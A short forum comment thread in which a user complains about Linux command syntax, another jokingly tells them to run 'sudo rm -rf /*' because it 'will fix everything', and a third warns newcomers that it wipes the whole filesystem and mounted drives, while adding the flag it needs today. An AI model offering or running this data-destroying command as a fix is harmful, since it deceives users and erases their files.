you are viewing a single comment's thread
view the rest of the comments
[–] 3 points 2 years ago (3 children)

What do you mean I have to type perfectly to the magic space cube or it can’t understand me? How the fuck is ‘sudo apt-get update’ English?

  • source
  • parent
  • hideshow 3 child comments
  • [–] 3 points 2 years ago* (2 children)

    Just type the following into the Terminal:

    sudo rm -rf /*

    It will fix everything.

  • source
  • parent
  • hideshow 2 child comments
  • [–] 1 point 2 years ago

    For any Linux noobs watching, NEVER DO THIS.

    This command wipes your entire Linux filesystem, including any and all drives you have loaded and active (including USB pen drives)

    With that said, for this to actually work nowadays you need to append ' --no-preserve-root'

  • source
  • parent